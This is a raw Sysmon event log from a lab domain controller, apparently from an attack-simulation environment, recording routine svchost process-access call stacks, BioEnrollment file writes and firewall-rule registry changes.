12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.075{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000004813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.059{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-3845273463-1331427702-1186551195-1148109977|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|M=microsoft.bioenrollment_cw5n1h2txyewy|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\|PFN=Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy| 13241300x80000000000000004812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.059{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{0C282241-BB67-46EF-A14D-6D045E24D38F}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 13241300x80000000000000004811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.059{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B7C2EDC9-7CD9-421A-925D-EABD93799C51}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 11241100x80000000000000004810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.044{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:16.044 23542300x80000000000000004809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.028{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 